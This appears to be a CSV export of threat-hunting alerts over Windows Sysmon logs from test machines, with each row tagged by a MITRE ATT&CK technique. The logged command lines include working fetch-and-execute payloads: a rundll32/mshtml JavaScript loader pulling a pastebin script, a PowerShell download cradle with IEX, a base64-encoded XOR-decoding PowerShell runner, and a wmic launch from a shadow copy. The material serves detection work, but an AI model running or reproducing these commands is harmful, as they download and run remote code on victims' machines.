( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" /c copy /Y C:\Windows\system32\rundll32.exe %%TEMP%%\out.exe > nul && %%TEMP%%\out.exe javascript:"\..\mshtml RunHTMLApplication ";document.write();h=new%%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://pastebin.com/raw/y2CjnRtH",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im out.exe",0,true);} )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4353 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-26 07:39:14.853 + 747F3D96-AE22-5D3A-0000-001004D84E00 + 5548 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\cmd.exe" /c copy /Y C:\Windows\system32\rundll32.exe %%TEMP%%\out.exe > nul && %%TEMP%%\out.exe javascript:"\..\mshtml RunHTMLApplication ";document.write();h=new%%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://pastebin.com/raw/y2CjnRtH",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im out.exe",0,true);} + C:\Users\IEUser\Desktop\ + MSEDGEWIN10\IEUser + 747F3D96-ABD5-5D3A-0000-0020EB990F00 + 0xf99eb + 1 + Medium + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-AE22-5D3A-0000-001096B24E00 + 1504 + C:\Windows\hh.exe + "C:\Windows\hh.exe" C:\Users\IEUser\Desktop\Fax Record N104F.chm + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1074] Data Staged - Process,1564436004.104732,2019-07-30T01:33:24.104732+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( powershell -c "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))" )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4912 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:23.380 + 747F3D96-6623-5D3F-0000-0010BC068800 + 3000 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + powershell -c "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))" + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F + 747F3D96-6623-5D3F-0000-001011F68700 + 5816 + C:\Windows\System32\cmd.exe + cmd /c powershell -c "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1557668280.712733,2019-05-12T17:38:00.712733+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16395 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 13:38:00.523 + 365ABB72-21B8-5CD8-0000-0010BADE2600 + 3856 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta + c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ + IEWIN7\IEUser + 365ABB72-1596-5CD8-0000-0020103A0100 + 0x13a10 + 1 + High + SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-2006-5CD8-0000-0010E0912300 + 2936 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1557668280.712733,2019-05-12T17:38:00.712733+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16395 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 13:38:00.523 + 365ABB72-21B8-5CD8-0000-0010BADE2600 + 3856 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta + c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ + IEWIN7\IEUser + 365ABB72-1596-5CD8-0000-0020103A0100 + 0x13a10 + 1 + High + SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-2006-5CD8-0000-0010E0912300 + 2936 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1557668280.712733,2019-05-12T17:38:00.712733+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16395 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 13:38:00.523 + 365ABB72-21B8-5CD8-0000-0010BADE2600 + 3856 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta + c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ + IEWIN7\IEUser + 365ABB72-1596-5CD8-0000-0020103A0100 + 0x13a10 + 1 + High + SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-2006-5CD8-0000-0010E0912300 + 2936 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1553028075.144276,2019-03-20T00:41:15.144276+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1966251 + + + + + Microsoft-Windows-Sysmon/Operational + PC01.example.corp + + + + + + 2019-03-19 20:36:04.206 + 365ABB72-52B4-5C91-0000-0010355B0100 + 1628 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd.exe + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-528D-5C91-0000-0020E7030000 + 0x3e7 + 0 + System + MD5=AD7B9C14083B52BC532FBA5948342B98,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-528D-5C91-0000-001062560000 + 484 + C:\Windows\System32\services.exe + C:\Windows\system32\services.exe + +",PC01.example.corp,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1602935016.312645,2020-10-17T15:43:36.312645+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\SysWOW64\rundll32.exe) with commandline ( "C:\Windows\System32\rundll32.exe")",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 417079 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-10-17 11:43:36.303 + 747F3D96-D8E8-5F8A-0000-00102CEF7200 + 840 + C:\Windows\SysWOW64\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + "C:\Windows\System32\rundll32.exe" + C:\Users\IEUser\AppData\Roaming\ + MSEDGEWIN10\IEUser + 747F3D96-CA8D-5F8A-0000-0020D1090A00 + 0xa09d1 + 1 + High + SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B + 747F3D96-D8E5-5F8A-0000-0010E1BC7200 + 2920 + C:\Users\IEUser\AppData\Roaming\WINWORD.exe + C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1565785034.89393,2019-08-14T16:17:14.893930+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( "C:\Windows\system32\rundll32.exe" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab})",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 10674 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-08-14 12:17:14.447 + 747F3D96-FBCA-5D53-0000-0010B8664100 + 2476 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\rundll32.exe" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab} + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-F419-5D53-0000-002026910200 + 0x29126 + 1 + Medium + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-F41E-5D53-0000-001067C80300 + 4824 + C:\Windows\explorer.exe + C:\Windows\Explorer.EXE + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1602935016.312645,2020-10-17T15:43:36.312645+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 417079 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-10-17 11:43:36.303 + 747F3D96-D8E8-5F8A-0000-00102CEF7200 + 840 + C:\Windows\SysWOW64\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + "C:\Windows\System32\rundll32.exe" + C:\Users\IEUser\AppData\Roaming\ + MSEDGEWIN10\IEUser + 747F3D96-CA8D-5F8A-0000-0020D1090A00 + 0xa09d1 + 1 + High + SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B + 747F3D96-D8E5-5F8A-0000-0010E1BC7200 + 2920 + C:\Users\IEUser\AppData\Roaming\WINWORD.exe + C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1565785034.89393,2019-08-14T16:17:14.893930+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( "C:\Windows\system32\rundll32.exe" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab} )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 10674 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-08-14 12:17:14.447 + 747F3D96-FBCA-5D53-0000-0010B8664100 + 2476 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\rundll32.exe" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab} + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-F419-5D53-0000-002026910200 + 0x29126 + 1 + Medium + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-F41E-5D53-0000-001067C80300 + 4824 + C:\Windows\explorer.exe + C:\Windows\Explorer.EXE + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920559.233522,2019-05-27T05:29:19.233522+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir "Filename: redirection.config" /text:userName ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5952 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:19.183 + 365ABB72-3D6F-5CEB-0000-001026B9FF00 + 1036 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list vdir "Filename: redirection.config" /text:userName + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558969974.544664,2019-05-27T19:12:54.544664+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 6188 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 15:12:54.428 + 365ABB72-FE76-5CEB-0000-0010546E0C00 + 2356 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-7B40-5CEC-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-FD85-5CEB-0000-00104C0E0B00 + 1944 + C:\Windows\System32\notepad.exe + "C:\Windows\System32\notepad.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1602935016.312645,2020-10-17T15:43:36.312645+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 417079 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-10-17 11:43:36.303 + 747F3D96-D8E8-5F8A-0000-00102CEF7200 + 840 + C:\Windows\SysWOW64\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + "C:\Windows\System32\rundll32.exe" + C:\Users\IEUser\AppData\Roaming\ + MSEDGEWIN10\IEUser + 747F3D96-CA8D-5F8A-0000-0020D1090A00 + 0xa09d1 + 1 + High + SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B + 747F3D96-D8E5-5F8A-0000-0010E1BC7200 + 2920 + C:\Users\IEUser\AppData\Roaming\WINWORD.exe + C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1565785034.89393,2019-08-14T16:17:14.893930+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( "C:\Windows\system32\rundll32.exe" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab} )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 10674 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-08-14 12:17:14.447 + 747F3D96-FBCA-5D53-0000-0010B8664100 + 2476 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\rundll32.exe" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab} + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-F419-5D53-0000-002026910200 + 0x29126 + 1 + Medium + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-F41E-5D53-0000-001067C80300 + 4824 + C:\Windows\explorer.exe + C:\Windows\Explorer.EXE + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1557680510.781015,2019-05-12T21:01:50.781015+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16496 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 17:01:31.380 + 365ABB72-516B-5CD8-0000-001087E41600 + 3788 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" + C:\Users\IEUser\ + IEWIN7\IEUser + 365ABB72-4FB5-5CD8-0000-0020F2350100 + 0x135f2 + 1 + Medium + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-502E-5CD8-0000-00102A330700 + 3192 + C:\Windows\explorer.exe + C:\Windows\Explorer.EXE + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Process,1558969974.544664,2019-05-27T19:12:54.544664+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 6188 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 15:12:54.428 + 365ABB72-FE76-5CEB-0000-0010546E0C00 + 2356 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-7B40-5CEC-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-FD85-5CEB-0000-00104C0E0B00 + 1944 + C:\Windows\System32\notepad.exe + "C:\Windows\System32\notepad.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1223] Compiled HTML File,1564126754.409237,2019-07-26T11:39:14.409237+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\hh.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4348 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-26 07:39:14.345 + 747F3D96-AE22-5D3A-0000-001096B24E00 + 1504 + C:\Windows\hh.exe + 10.0.17763.1 (WinBuild.160101.0800) + Microsoft® HTML Help Executable + HTML Help + Microsoft Corporation + "C:\Windows\hh.exe" C:\Users\IEUser\Desktop\Fax Record N104F.chm + C:\Users\IEUser\Desktop\ + MSEDGEWIN10\IEUser + 747F3D96-ABD5-5D3A-0000-0020EB990F00 + 